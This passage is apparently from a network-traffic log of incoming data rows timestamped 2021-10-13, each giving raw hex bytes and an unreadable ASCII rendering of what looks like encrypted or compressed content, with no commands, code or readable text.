55 b3 a8 bb 42 c9 34 ad 73 08 0c d1 fd 31 bf 33 d5 6b d2 f8 75 Data Ascii: (2wMof6^/Gd"\lalVv'DL\D?YU6$nz5(Fg\|]<T1(Hr;.1!Tld'Ej%vG?Yh?/.jo-(bO!7O3PU9k&=X1cUB4s13ku
2021-10-13 11:06:38 UTC	98	IN	Data Raw: 4c ba 39 b0 db db 45 0d 61 a2 fb 8c a0 88 db 38 d5 43 24 23 bf f3 05 20 85 b5 71 a3 84 ad 55 85 66 66 57 22 98 bc 2e 2a 6f fe 05 71 07 93 6f 8c 8a ee 05 0d 7e b7 d4 86 cb 75 4b 26 84 2b f5 2c 45 91 f3 73 a1 a0 50 cb 49 4e 04 ee e0 dc 5b d6 5b 51 4d cf 04 51 87 96 2d 06 80 05 73 ca 17 2e 67 d0 bf d3 54 9a 69 72 dd 08 9d 3f df 28 95 b1 94 71 86 a1 fd be f4 60 e5 28 4b fb a5 5b 02 cb bd 91 31 03 4b c2 fe 2f 44 a6 ba ad 2f d3 dd 84 7e 57 15 c3 41 23 86 54 fa 1a cc 09 bb f8 6d 09 98 29 4a cf a5 8f 22 b4 ff 3e 61 5e 6f b9 e7 f0 92 04 bd 38 53 70 03 33 9d c2 a9 62 97 b0 3c 4b ba 13 70 da 24 2a 40 c4 6e f3 83 f3 0e c0 6a 93 a2 69 29 b3 9f 2f 47 a4 eb c7 70 59 34 93 3a 5a e3 fb 32 ef 57 90 a9 8a 39 f9 09 8f f6 9b f7 8d be 7e 0f 56 db eb 0d d0 9d ae 3e 51 c7 05 9e Data Ascii: L9Ea8C$# qUffW".oqo~uK&+,EsPIN[[QMQ-s.gTir?(q`(K[1K/D/~WA#Tm)J">a^o8Sp3b<Kp$@nji)/GpY4:Z2W9~V>Q
2021-10-13 11:06:38 UTC	99	IN	Data Raw: 2f 6b fd 81 f0 41 42 19 cc 9f d3 23 c6 89 65 dc 39 09 7c ab c9 0b 76 c6 11 86 fd 83 54 00 2b e0 d7 00 b2 80 a7 54 7a 86 ad 1b 63 e7 e4 0e 6d 7c 96 86 64 9f 2b 86 f6 a3 57 36 08 7b c7 43 af 7e c2 98 5a 8b f4 c3 5e 0f 34 11 38 23 c0 2a 6b 5b be 37 e7 47 05 46 87 7a 18 21 4c f7 e6 42 f2 9f 8b 37 e6 ae 6c b7 a0 86 cf 98 40 83 b2 b7 05 5c 6f 3d 77 15 2b bc 00 ad 0d f6 c7 a3 b2 1e be 37 30 87 0e c9 53 3a 7f cd f5 15 2c 3f 29 b3 b1 ab d9 17 b0 21 77 b2 90 26 7d 17 b3 73 ee 09 49 21 56 3b ee 93 eb e0 b6 ed a8 b8 f8 79 35 1d 13 0e 2a 18 75 81 28 92 cb b3 e4 fc f0 81 00 91 26 04 e3 e6 25 ef 6f bb 64 e4 06 fa b5 64 b1 e8 6b 1a 54 99 48 5b 74 88 4b 65 b6 9a a9 db 74 f2 7d 25 50 2a c0 b9 4f 42 98 03 58 d7 34 7f 68 2c ff 96 a5 47 8b e2 d5 bd b0 10 03 f3 ed ec c5 ca 03 Data Ascii: /kAB#e9\|vT+Tzcm\|d+W6{C~Z^48#k[7GFz!LB7l@\o=w+70S:,?)!w&}sI!V;y5u(&%oddkTH[tKet}%P*OBX4h,G
2021-10-13 11:06:38 UTC	100	IN	Data Raw: cc 60 5d 1e 4d 60 5a 9d e2 a7 f6 de 60 51 7d bd 07 1c cb 7c 4f 8b cb a1 a9 2f c7 e1 ba 54 c1 6c 66 4f 4c 83 f0 8e 73 2d 06 78 b5 02 30 71 6e 6b cd 6c cb 9a 6a 67 20 a4 8b ef 95 92 91 09 0a 8b d4 62 be 87 1d 52 1b f3 a7 3d 0d 0f 22 4b a4 67 bf d0 db 41 10 6d b9 c3 93 5e 8e f6 35 d2 e1 b7 23 ae fb 28 54 8a b4 75 bc fd 91 5d 92 99 4a 70 08 ae b2 2e 24 01 83 06 5d 04 ee 6f a1 eb 26 04 09 66 b1 fc 1d d0 8b 40 07 a6 bb df a3 4e 9d f0 21 89 ba 5c c1 69 96 fb ef ca c7 2c 6b 35 c5 49 c4 17 4e 81 b5 0b ea 87 01 e2 e3 d9 38 78 d5 b4 dc af f4 d3 7a da 1a cd 07 dc 78 80 ab 95 12 4c a8 e2 b1 26 7f d8 26 5d fa a3 51 02 cb bd 86 2a 0a 30 d0 e9 d1 41 9b bd c1 07 d2 d5 9f 1b 6d 15 ef 45 2e 91 6a 8f 72 31 f6 b6 ff c4 e7 95 3b ed 31 b3 a8 f3 b4 e4 40 20 4d 6b 8b a9 f2 c2 6b Data Ascii: `]M`Z`Q}\|O/TlfOLs-x0qnkljg bR="KgAm^5#(Tu]Jp.$]o&f@N!\i,k5IN8xzxL&&]Q*0AmE.jr1;1@ Mkk
2021-10-13 11:06:38 UTC	102	IN	Data Raw: 10 9a 67 12 6a 2c 28 b5 e4 7c 13 b9 94 bf 8f 3a 68 99 8f ad 20 08 bf aa 80 4c f9 56 44 8b 36 d5 e1 23 12 6d ae bc 11 52 9e 5b 81 06 fb 4b 72 39 e1 6b 34 01 73 37 2a 89 3d 86 d9 37 62 78 bf aa c0 4c c8 14 a9 7b 58 2c de 68 35 97 a8 3d 69 f0 f9 6f 28 85 9c a3 46 cd 31 d3 90 77 de 3a 16 67 50 d4 d9 78 e9 77 a1 87 8d 51 39 f0 e2 ac 10 ac 8b b0 44 78 ec bb 05 74 1d 6b 95 15 d7 ed 88 6f 82 3c 95 de 2b 50 2e fc 6c f3 23 04 05 d0 93 45 97 f0 fe bc e0 cd f1 37 ce c4 06 60 5c d2 c7 e7 6b 02 58 1a c8 ae 18 d0 ea f6 b6 e5 ab ed a6 20 50 99 57 a8 84 da 9d 51 94 a8 b9 05 5c 6f 22 63 65 3e ae 05 a9 1b 7d 6f 19 64 86 90 3f 32 86 c0 aa e5 37 6c c2 ea 11 3a 26 22 5c b6 9c 32 11 9e 53 07 a6 91 22 16 9d ad 60 e2 00 82 9f 9e 22 0f 9e d4 c7 b4 87 a3 a7 06 7c 1b 17 50 ca d5 e7 Data Ascii: gj,(\|:h LVD6#mR[Kr9k4s7*=7bxL{X,h5=io(F1w:gPxwQ9Dxtko<+P.l#E7`\kX PWQ\o"ce>}od?27l:&"\2S"`"\|P
2021-10-13 11:06:38 UTC	103	IN	Data Raw: b6 ca c4 c8 c6 f0 76 58 02 6c d9 7c 3d e1 f8 e2 67 fb 33 c1 84 a5 b5 bf 39 35 a9 da 72 03 91 35 d2 3f f8 45 36 6d a7 fe a6 83 9a 08 db 56 f1 81 06 5f bf e8 7d 61 cf 18 8e d4 8c d9 29 73 8f dc c2 83 b2 86 97 50 8b 88 7b 4f fe 3a eb d0 06 9b b4 4d 6a 4f 85 db a3 ed ff 67 4f ac bc 2b 0b 12 07 41 9b b8 29 bf 07 57 ef b8 5d df 19 c2 e7 4c 85 d6 9d 7e 36 6d 0d a4 06 27 de 78 4c 04 7f b4 80 3a 71 2f 65 ac cf 20 96 99 6c 4b 93 bb c1 62 80 3d 4c 09 e7 a7 2c 0b 10 2f b5 b8 68 96 d8 a0 4f 11 6d a6 f1 ed 52 88 f7 31 bd b4 b5 23 b5 93 7a 54 95 b4 75 bc 5e 85 c1 90 98 6d 6d 3e ef 19 2e 22 78 1f 08 4e 0a 94 7c f5 9b e3 fb 08 4c ac d6 f5 dc 8a 4a 0e 8d 00 41 a1 44 9b ef 41 75 13 5c cb 4b 49 f7 fc c8 d4 39 69 43 af 4a e8 12 5f fc 90 37 f8 85 2f 18 7c db 32 61 ca a4 c9 aa Data Ascii: vXl\|=g395r5?E6mV_}a)sP{O:MjOgO+A)W]L~6m'xL:q/e lKb=L,/hOmR1#zTu^mm>."xN\|LJADAu\KI9iCJ_7/\|2a
2021-10-13 11:06:38 UTC	104	IN	Data Raw: 4b f0 d9 17 c7 00 c1 e6 02 75 b5 5f d5 83 a7 2c b9 35 04 52 a7 9a 1e 17 a1 ed ed 23 bf 0b 9f c0 ba 04 22 24 df c3 c8 ad ec 65 86 56 46 d9 f2 7f 92 fc e9 66 2f a6 f5 10 12 ce cf 7e b8 4f 44 41 90 23 6e 0c 1d 76 76 8e 2a 87 3b 24 89 10 9a 67 34 a8 3f 20 b5 ec 67 0a af 7b b8 bc 38 95 c8 d8 96 23 73 b5 b5 c0 01 06 aa c0 8f 20 c6 ed 4c d1 64 b1 ad c7 c9 b0 51 83 7f 4b 24 db 33 fe 79 38 1d 60 20 22 87 32 67 c9 e5 71 56 d8 a6 ba 42 cd 03 ba 0b b2 0e df 62 3d a0 38 2c 61 fa fe 7d 5f d2 9d 8f 42 f2 23 80 96 77 42 17 09 6d af df ec 64 e2 0c 95 8e 94 ab 01 03 e4 ba 03 b6 9a b0 4a 78 ec b5 05 69 1d 6b 95 0e d6 c6 93 13 a2 39 83 f2 ad 59 3d fe 7a fa 44 bb fb d1 b5 59 98 f0 f0 bc e0 c3 f1 05 ce c4 06 78 75 ac f1 5c 97 f9 a1 be 7f 0b 00 4a e8 8a bc f3 b3 62 0f 20 41 85 Data Ascii: Ku_,5R#"$eVFf/~ODA#nvv*;$g4? g{8#s LdQK$3y8` "2gqVBb=8,a}_B#wBmdJxik9Y=zDYxu\Jb A
2021-10-13 11:06:38 UTC	105	IN	Data Raw: c0 f4 a0 42 72 96 a3 99 50 28 ed 0f 16 48 6c c0 9d de 25 fd b0 1c 66 81 b7 77 ef 85 b7 46 84 58 54 47 f7 2b 74 fb fc 58 7b a7 2f a0 85 dc ad 55 45 53 80 d8 7f 6a 36 6e cd 19 88 6d 88 ff 83 3f aa 76 21 15 2f 8a 76 7e d7 70 55 68 f7 b6 d1 d3 dd c6 0a 77 65 09 70 cb 9c ea e5 67 e2 1c ff 21 c7 9f b6 b0 b0 b7 93 ce 6c 7c fd 9a 06 d8 29 87 59 26 69 bc e5 36 c2 93 dc 26 d2 e0 8f 15 53 a5 74 5e 7f 31 18 af d2 99 ce 67 39 ae 40 df c8 24 9c 8b 53 1e 92 6a 52 73 3b e2 c0 97 33 98 41 71 54 9d 88 05 ed ee 63 4e 59 ae 0f 1c 01 74 50 8c 46 2c 85 22 dc e8 a7 4f 89 2a ac 4e 4c 9a cb 91 7f 25 78 05 aa 16 c4 21 55 70 10 75 d0 84 ed 59 a0 78 81 ed aa 91 86 73 4e 83 d4 79 6a 9f 38 ac 1b cf b3 38 0c 07 3b 5f 6f 6c 84 db db 4b 6d 71 a3 f3 92 41 99 e4 3d d2 2c bf 3c aa 07 79 03 Data Ascii: BrP(Hl%fwFXTG+tX{/UESj6nm?v!/v~pUhwepg!l\|)Y&i6&St^1g9@$SjRs;3AqTcNYtPF,"O*NL%x!UpuYxsNyj88;_olKmqA=,<y
2021-10-13 11:06:38 UTC	107	IN	Data Raw: bd 23 5a 79 f8 23 b7 49 52 75 a4 e9 0d 6b bf 13 6b dc 48 da 40 e8 69 84 0b f5 0e db e2 1e 5c 68 04 a9 b5 aa 40 d7 b8 eb 74 45 32 50 5a 5c f2 e2 4b e7 a8 91 81 8d 3f f7 04 f6 28 2c f1 5f 29 ab 0e 7a df bd c0 ca 8e ae 3c 3b cd 19 60 4b e7 8f 91 57 02 c1 f3 38 64 c6 51 c5 8b bc 23 3c 24 29 59 a4 9a 31 0e e9 7d 49 3c b1 12 b1 c2 d0 02 3c 34 25 cb f2 cb 44 fb 78 a3 9f d1 e9 b2 b8 fe 83 60 31 bc 0f 7e b8 d6 cc 24 ac 5e 77 28 6e d8 fe 54 13 5e 4b 87 f0 35 7d 61 95 11 90 bd 2b a5 06 2e 9f bc 73 15 b9 85 b9 90 29 84 98 a3 8f 94 72 b1 ab 48 49 fb 55 33 90 37 d5 ff 4c c0 6d bd 8a 3b c8 b4 5b 8b 10 e9 24 db 28 f7 6a 00 0e 60 36 3d 66 3a b5 ca d1 68 54 a4 be 45 43 e5 16 ba 73 23 0b c7 96 30 93 30 14 6b d1 0c 77 3c 36 9d a3 48 f8 59 c2 be 60 cf 3c 03 6f b1 cf dd cc ea Data Ascii: #Zy#IRukkH@i\h@tE2PZ\K?(,_)z<;`KW8dQ#<$)Y1}I<<4%Dx`1~$^w(nT^K5}a+.s)rHIU37Lm;[$(j`6=f:hTECs#00kw<6HY`<o
2021-10-13 11:06:38 UTC	108	IN	Data Raw: 80 99 35 a9 22 b7 f5 ff f9 03 f9 90 0a 1f f5 f5 33 83 57 1d 64 e0 82 6b 26 e9 d8 79 45 99 d5 f6 9d 4c f9 89 54 75 a4 8b bd de 59 47 83 24 76 3d ff 44 4e 42 8f 10 ca c7 ca 7e 45 3a c0 87 b5 0d 76 1d 20 bf b2 20 06 f9 e4 e6 d1 e2 34 4f f6 a6 5f f5 8c b0 91 51 2a e1 01 05 a0 45 1c 80 db 20 57 be 14 a4 bd 98 5e 4c 8f 9f e4 ae ea 5e 3a dc 06 76 d4 db 47 7c 87 c2 b5 8d c1 45 d9 6e 58 83 d1 43 f5 20 46 64 12 94 74 94 d7 63 33 b0 8e 36 b4 20 b2 47 7e c3 64 5a 53 5c b6 c0 d1 ea 64 f4 76 43 2e c1 c3 82 36 f7 82 1f e3 0a 35 d5 a8 50 a7 b8 b1 94 4b 74 72 03 9a 3e dd 38 d4 e6 27 69 b2 d8 02 82 b6 29 d3 f3 ef a5 2e 6c a5 65 5c 6c d9 13 ab e5 9a c6 73 31 86 cd f7 c8 2e 8f ce 50 17 81 62 52 62 33 fd ca 69 32 47 4c 60 50 79 c9 a7 ed fe 63 51 52 a7 07 1c 11 67 7f 9f b8 a9 Data Ascii: 5"3Wdk&yELTuYG$v=DNB~E:v 4O_Q*E W^L^:vG\|EnXC Fdtc36 G~dZS\dvC.65PKtr>8'i).le\ls1.PbRb3i2GL`PycQRg
2021-10-13 11:06:38 UTC	109	IN	Data Raw: 90 9b 52 cb 01 8f ea de 28 9b 94 e4 82 79 56 3c a1 1b 70 bc 19 4c ff d9 64 0f da a8 fb 00 0f 4b cb 87 86 45 8a b2 66 0b 26 d1 9b 72 83 13 c5 43 08 83 2d c3 e5 33 f4 bc d2 7e 14 9b 29 eb c4 a5 8f f3 8c ff 2f 77 41 6b 81 75 f0 92 04 bd 2b 57 68 fd 76 b1 c5 aa 5f a5 e8 25 36 bf 13 61 c8 33 d4 41 e8 6d eb 90 f5 0e d1 6e 04 5d 68 05 a7 9d 36 41 74 b3 c7 70 5f 38 8e 29 5e e3 ea 36 f4 a9 91 85 36 2f f3 13 06 f2 9b e6 da a6 80 0e 6c de c0 d0 cb 8e aa 3e 5b f3 11 60 ba ec 99 fe 2b 00 c1 e8 00 eb 96 5f c4 8a ab 28 34 8c 28 59 aa 9f 26 1b 58 06 3a b8 b3 18 91 d7 26 0b 3d 34 20 d1 ea b5 da ef 69 a0 1b d7 ed 7f 95 ed f7 7a 24 ab 86 3e 3e d4 cd 3d aa 25 5a 56 87 bb 10 9a 08 5e db 87 f0 35 73 48 85 07 0a 4f 34 a2 23 3e 2f d5 7e 15 b9 8f 69 82 29 96 83 8b 9b 22 73 bb 83 Data Ascii: R(yV<pLdKEf&rC-3~)/wAku+Whv_%6a3Amn]h6Atp_8)^66/l>[`+_(4(Y&X:&=4 iz$>>=%ZV^5sHO4#>/~i)"s
2021-10-13 11:06:38 UTC	111	IN	Data Raw: 48 b3 97 dc 9d 40 92 b7 ad fb 3a 24 38 74 04 30 af 04 b6 2c f0 d8 03 4c 1f 92 d1 38 90 c9 ed 4b 32 6c ce 86 bf 2b 20 28 41 b8 e8 70 12 b2 50 74 cd 03 22 12 9b ba 7a 8b 63 93 99 8b 23 f7 b4 a0 f4 b0 93 c9 a6 06 72 6d 56 2b d6 d5 f4 8e 99 5f 12 ce b3 ff 96 f6 8f fe 9a 26 32 f0 e5 0f 9c 7a ba 62 8f 48 4f 0d b9 f7 df 6d 74 db da 89 4b 70 a6 5d 70 a5 99 c6 0a 73 e4 89 4b 69 29 d7 a0 41 53 8d 69 86 c2 ca 74 43 06 31 90 9d a8 08 8e 2a 97 a9 4f 7e f3 e8 e4 ce db dd 24 90 a0 48 72 a6 2f 4f 5c 28 e3 3c 06 a7 6b 83 d3 db 26 ff 73 17 ba 77 99 53 c7 b8 9f ee 8c 4b 5b 12 dc 2f 74 f9 e9 68 50 af 2f bb 53 c7 55 7e 68 44 83 d0 55 e1 2c 6e aa 97 94 72 80 ff 92 37 b0 88 20 39 b2 27 47 6a cd 70 4e 7a e4 86 c8 db 78 d5 f4 76 a6 06 73 d2 aa 37 c8 ec e6 08 dd f0 c3 80 a8 8b a9 Data Ascii: H@:$8t0,L8K2l+ (ApPt"zc#rmV+_&2zbHOmtKp]psKi)ASitC1*O~$Hr/O\(<k&swSK[/thP/SU~hDU,nr7 9'GjpNzxvs7
2021-10-13 11:06:38 UTC	112	IN	Data Raw: 84 b3 5d aa 89 ad 57 ba cf 65 7b 26 a8 9e 2c 22 74 6f 7c 5d 0e 9e 60 f3 82 80 cf 0b 60 b1 cb 82 c8 9c 25 fe 8f 28 db b5 6c 84 f8 5f 10 b6 5b e3 50 53 fa e9 a3 cd 29 6d 50 68 fc c5 1d 5d af 8c 33 f8 87 24 7e c9 ca 37 6b d6 d8 d4 ab 9b 4f 54 d6 19 c8 39 db 28 97 86 b9 7d 86 a3 ef b5 0c 0e 03 20 4c f5 c7 70 19 dd d6 7a 3a 0f 4d e2 fa d0 45 80 90 ed 21 d3 d3 b3 5a ab 14 e9 2c 70 83 6c ad cd 06 f4 bc d8 6d 3e 8c 3a e3 f7 f4 8e f3 b4 ee 28 75 36 5c 80 75 f4 fd cf bf 29 5d b2 e5 ea a6 1f bd a3 29 fd 25 58 bf 00 68 c8 22 d3 43 93 5a ea 90 f3 61 1a 6c 8f 56 b2 1d 67 8a ec 52 c6 a1 cd 5b 6b 29 87 38 54 e1 ec 59 3c ab 91 8f 87 3f fb cb 84 24 8a ec 91 7c 56 16 6d b1 34 d1 cb 88 82 2c 41 c3 12 48 18 ec 99 f8 ef 2e c3 f9 18 09 c5 5f c4 81 1a 30 4d 23 fe 4a aa 9d 2a 1b Data Ascii: ]We{&,"to\|]``%(l_[PS)mPh]3$~7kOT9(} Lpz:ME!Z,plm>:(u6\u)])%Xh"CZalVgR[k)8TY<?$\|Vm4,AH._0M#J*
2021-10-13 11:06:38 UTC	113	IN	Data Raw: 13 90 95 86 55 11 24 fd bd ee b2 ac b0 41 71 ea 6b 8b 74 39 7d 6f 8f fe 96 86 6f 8e 27 91 e5 b9 52 3f fd 65 ca b2 ac 29 dd 9a d4 38 ea e0 6a 2b d8 ea 3e 12 d6 21 7a 4f a2 d6 d2 95 07 72 b2 76 0f e6 4e 87 0a bd f3 b5 85 60 dc 51 93 4e d0 46 de 9d 4a 85 6d c2 29 5f 43 32 0e e4 31 af 03 7b 11 ec ed bc 47 1f 83 34 27 b2 26 c4 60 3e 54 f0 0b fb d6 3f 01 5e bb 87 dd 1b ad 56 87 b2 bc 2b 2a 92 b3 73 e4 1f 9e 8a 8a 30 e0 94 e7 cf 48 fd 81 aa 17 7f 03 7b d2 d7 d4 e1 95 b5 32 8a ce a2 fe e6 ff 70 ff bc 1b 19 8e 1d 26 94 79 ab 61 8f 58 4f 0d b9 c0 7c 7e 7f d1 e7 90 45 6a 70 55 59 b4 98 c6 36 70 e4 85 35 7a 46 07 a8 4a 48 96 19 54 cb ca 6f 4f 31 f3 6d 9c 82 7f 25 b8 94 a3 20 19 db fb e5 c5 db d0 51 08 a1 64 70 b3 4f 91 50 39 fe 03 0a b6 7c e7 98 25 27 d9 a7 13 b9 38 Data Ascii: U$Aqkt9}oo'R?e)8j+>!zOrvN`QNFJm)_C21{G4'&`>T?^V+*s0H{2p&yaXO\|~EjpUY6p5zFJHToO1m% QdpOP9\|%'8
2021-10-13 11:06:38 UTC	114	IN	Data Raw: 75 ad 8b 4f f0 5f 12 14 2a 82 00 88 c9 b8 07 3d 25 2a d5 1a a5 f8 fa 60 ba b2 c6 f2 67 85 f1 06 6f 1c b7 78 11 3c d4 ca 3d bf 2b 44 53 9b 27 10 81 00 48 82 86 dc 36 6d 48 6a ee 65 7c 14 a0 27 28 a4 f6 70 2d 47 84 95 9c 38 9e 84 cc 76 23 73 b7 b4 b9 5b f0 55 2e 9b 28 94 1b 4d ec 4e a9 d5 c5 c9 9c 5d 8c 7f 1d 25 db 3f 8e b0 29 15 6a 26 f0 f7 e9 9b c8 c3 6b 3b 5c a9 bb 44 d6 56 be 73 23 1d d4 77 07 41 33 13 65 eb e5 69 07 2d 9d a3 4c cd 14 d3 9d 77 de 37 16 40 50 d4 d9 64 e9 05 93 50 1c 42 da 38 34 21 3b b3 80 a2 4e 67 d3 ae 11 63 f2 61 a6 2e 2b 97 aa 7f 85 57 7f f7 b2 54 3f f1 15 3b 4e ad 0f cf b4 49 84 e3 e9 b7 ee eb 10 20 1c d0 23 62 88 aa c0 f1 bd 97 88 97 f1 af 0e 80 15 09 43 ec 92 91 04 20 41 98 57 82 69 dd b1 4d 91 39 1a f2 45 95 e2 72 1a 2f 91 16 a6 Data Ascii: uO_=%`gox<=+DS'H6mHje\|'(p-G8v#s[U.(MN]%?)j&k;\DVs#wA3ei-Lw7@PdPB84!;Ngca.+WT?;NI #bC AWiM9Er/
2021-10-13 11:06:38 UTC	115	IN	Data Raw: f4 af 1a dc 8a 8c 76 ef 8f 9f ee a6 18 05 12 47 2a 74 f5 54 3d 2b ae 2f b5 8f c5 28 17 68 58 87 c7 8d f6 e2 e3 ec 12 94 7f fd ba 93 37 b4 a2 20 39 27 a1 77 7a d7 f2 4f 7b ff 41 c0 db d3 c3 e7 73 71 6a 72 c3 82 3c dc e9 f7 e2 f4 1e c2 98 b1 a6 b8 a6 87 d9 79 8c 02 a2 bd c9 2c fc 47 5c 2c b9 f0 5c 80 cd 65 d8 2d fb 88 10 5d 8d 50 57 61 c5 1b 81 a1 dd c7 79 eb 90 e3 d7 c8 2e a4 f2 0a 16 81 66 5b 64 e5 f0 f2 42 33 b4 4d 63 59 50 db a3 ef ec 74 3e 54 bf 07 1a 6d 39 4e 9a bc 3c ad 2d b6 ae b9 57 cd 32 8f 4c 37 c0 dd 82 73 33 61 04 b7 79 79 21 79 64 3b 48 ce 8e 31 78 29 01 c2 e6 b9 90 4f 6b 65 66 d4 68 62 82 4c 17 1b e3 a3 2b 07 06 35 4f 91 71 be da d1 43 01 69 df b5 97 5e 8d f5 37 a9 7e b6 23 bb 84 3f 2e 84 b1 7d 92 97 a6 4e 97 98 76 7e 3a 7e b1 02 33 70 7b 43 Data Ascii: vG*tT=+/(hX7 9'wzO{Asqjr<y,G\,\e-]PWay.f[dB3McYPt>Tm9N<-W2L7s3ayy!yd;H1x)OkefhbL+5OqCi^7~#?.}Nv~:~3p{C
2021-10-13 11:06:38 UTC	116	IN	Data Raw: cb 59 16 6c c7 9d e6 0a c0 67 b1 ba 68 05 bf 82 2f 52 da b2 d6 7d 4c 2b 70 28 72 ee fb 3e e1 39 a8 3f 8f 2e f3 0c 88 e1 96 e6 98 a9 99 f0 7b f2 de d2 b0 c7 ab 3e 44 d5 11 14 ce ee 99 ff d1 02 ba b0 1f 66 b9 d1 73 a3 8d 20 47 3e 32 4a ad 8c 31 07 41 0b ec 3d 9d 08 95 bb ef 0d 3d 30 34 82 35 a5 d4 f9 67 b3 aa cb e3 7d 97 e3 f5 90 31 90 01 00 3b c3 1a 3d bf 2b 44 53 9d 27 10 87 04 88 7d ab a3 3d 2e 11 94 11 9e 77 03 a9 2f 28 b3 ea e2 12 b9 85 b8 83 2f 87 9e b5 86 0a 62 b1 ab 8a ea ea 53 2c 97 26 d2 f1 58 d7 e1 81 ba 39 c9 8f 53 9a 18 f7 33 47 28 e9 49 88 15 60 3b 3b 90 2d 09 e4 c3 72 53 b5 32 93 53 c9 14 a7 75 0b 1d df 68 3b b3 2e 2c 64 fa fe 78 58 39 62 a2 60 df 32 c8 8e e7 f6 8e f7 92 51 ca e3 64 e7 0c 95 8b 92 5c fe 2e ce 9d 12 c8 c8 a2 42 7c f5 c9 08 63 Data Ascii: Ylgh/R}L+p(r>9?.{>Dfs G>2J1A==045g}1;=+DS'}=.w/(/bS,&X9S3G(I`;;-rS2Suh;.,dxX9b`2Qd\.B\|c
2021-10-13 11:06:38 UTC	118	IN	Data Raw: bf 64 47 88 4d 0d 48 df 6d 7c 62 c2 f3 b0 19 74 9f 51 6c 5b 9e 85 cf 65 ce 99 37 79 29 c6 af 52 bc 88 2a 49 c2 a5 b7 44 2e de 8b c0 b8 58 38 33 84 a6 20 17 f6 ff 10 c4 e6 d8 53 e5 a5 48 69 8e a6 6f 51 15 e6 07 12 b3 6d fd 81 c1 d8 f4 83 12 9b ab a7 cd ed e0 56 ee 86 52 32 19 d6 2a 74 ff e3 40 68 ef 74 92 8d c7 53 54 69 58 73 ef 0e c9 a5 6e c7 18 23 69 56 72 b9 37 b0 89 2b 2f 20 3c f0 68 0d 63 4a 76 d4 94 c2 d2 da 0d ec 19 a6 06 73 c9 8e 3b c4 e4 c0 1f f7 32 c1 a8 40 a1 b8 bd aa 25 71 72 09 07 23 de fa f1 4c 36 6d 89 29 5f a8 b6 30 e9 2e ff 3f 06 5b a5 99 56 61 de 0f 90 d8 a2 6d 79 ef 86 cb cc cd 35 71 8e 60 12 aa 07 4e 71 36 fd db 6c 2a 4a 4c 4c 59 f9 71 a7 ed e4 68 48 41 b8 07 0d 15 62 b1 9b 94 25 a0 38 1b e0 a7 5e da 06 ad 5f 49 9c 22 83 5b 23 6b 1e b1 Data Ascii: dGMHm\|btQl[e7y)RID.X83 SHioQmVR2t@htSTiXsn#iVr7+/ <hcJvs;2@%qr#L6m)_0.?[Vamy5q`Nq6l*JLLYqhHAb%8^_I"[#k
2021-10-13 11:06:38 UTC	119	IN	Data Raw: cf 4d c6 fe d8 4e 6c 53 b9 8e 31 04 5a ce e0 be b2 8b b8 bc 2e c2 d2 8f 5c 46 10 ef 45 1f 0e 6b a7 e5 32 e5 a2 c3 60 2f b3 0c ee cf a3 2d e2 aa eb 3b 63 65 c8 81 75 fa 83 03 a9 01 b8 6c fd 34 a6 48 ad 75 a4 e9 36 47 af 0c 77 f6 15 d1 41 ee cf fa 8f e3 1a c5 46 2c 5c 68 0f 97 a0 34 41 dd 9a 75 70 53 32 b7 e4 5f e3 ea 3f e2 81 52 86 8f 28 e4 9e 9b f2 9b e7 9a 84 91 2e 6c c8 4c ef cb 8e ab 9c 51 e3 0c 74 5b c6 3a fe c7 0a d5 d1 dd 65 bd 59 d3 06 bf 21 47 35 3b 78 b1 ad 36 1c d2 2d 12 3c b0 ba 86 e1 bf 18 29 1c 82 c2 e4 ae c0 d1 bb aa b9 c0 f4 e1 9d fc f8 6f 23 9e 1a 33 28 c3 40 11 ba 34 4b e2 81 05 15 9e 0b 5e df 87 f0 35 41 71 56 12 9a 65 3c 3e 2b 28 b5 fc 7c 36 a8 a6 af 86 a5 a9 98 a3 8e 80 62 92 bf 94 5c d3 f6 3f 90 3d c1 cd 88 c3 6c a8 ac b4 cf 9c 5b 8a Data Ascii: MNlS1Z.\FEk2`/-;ceul4Hu6GwAF,\h4AupS2_?R(.lLQt[:eY!G5;x6-<)o#3(@4K^5AqVe<>+(\|6b\?=l[
2021-10-13 11:06:38 UTC	120	IN	Data Raw: 1c f7 d2 72 ba 1d 92 3f 1d b8 ef c5 4c 3d 7f da e1 0e 01 18 22 4d ba 5a 2e 12 b2 5a 7b 9b b7 27 12 97 99 57 e4 00 99 b1 b0 30 f1 95 c1 2c b4 fc ad b0 8b 53 19 14 2a c5 cf e5 a2 b9 24 81 c8 9b d1 f9 ef 84 8d 63 0b 1e e7 f2 33 85 6b d5 95 e1 88 4b 62 55 dd 6d 67 67 f4 ce 95 5b 74 8e 46 50 8d 78 ab ca 7b 68 a9 24 7c 32 c4 b6 5b 5e 9d 2e 6f c4 ca 78 52 a3 d3 93 9d af 62 09 3e bf 00 20 06 f9 c0 c6 c0 ca dd 5d de 48 4a 78 81 a1 8d 44 11 cd 14 01 b0 7b 61 83 db 26 f4 bb 04 a4 81 2f 76 ef 85 b7 c7 83 58 58 2c fe c2 76 ff e9 68 81 ad 2f bb 9c db 47 7c 41 5c 83 d6 41 6c 33 6e c7 13 80 6a 94 d7 31 37 b0 82 08 13 22 b2 41 69 ff 98 4c 7b f5 9e 29 d9 c2 df dc c4 49 06 79 ef 9f 2d d1 f8 c8 9b f6 32 c7 96 2f a4 b8 b7 83 d2 67 66 2b 38 2a c9 26 d4 d9 27 69 b2 e3 42 93 aa Data Ascii: r?L="MZ.Z{'W0,S$c3kKbUmgg[tFPx{h$\|2[^.oxRb> ]HJxD{a&/vXX,vh/G\|A\Al3nj17"AiL{)Iy-2/gf+8&'iB
2021-10-13 11:06:38 UTC	121	IN	Data Raw: d5 0f 94 67 9e 0d ee 05 03 6d a4 c2 9d c5 8b 5b 1d 91 32 23 a2 68 bf e8 4d 75 46 5d cb 47 40 95 3d ce d4 22 02 a6 50 4b c2 0a 32 55 9c 36 f2 ee d5 76 e1 df 25 04 02 b5 cd a0 f4 bb 79 da 16 f3 3e c1 33 82 b9 9d 6c 91 b6 c8 49 0b 4d c6 33 58 ee cd c6 b4 f4 78 8c 3b 0f 54 e1 fb c6 45 9b af a5 02 2d d4 b7 7f da 36 ed 43 0e 90 7c b8 c7 20 e1 bc c3 69 26 83 d7 ea e3 af 86 ca 27 01 d0 88 52 72 92 62 f0 83 13 a5 d7 56 44 f4 41 0b c5 aa 7f ae f1 36 4f be 02 76 c1 25 2a 40 c4 62 e3 b8 78 0f d1 64 b5 36 96 fa 40 82 21 52 c0 b2 d6 67 4c 1c 70 28 72 ff fb 26 e7 a2 b9 a8 8a 2e f5 3b b2 f0 9b e0 a1 48 82 0e 70 b1 e6 d2 cb 88 b5 1b 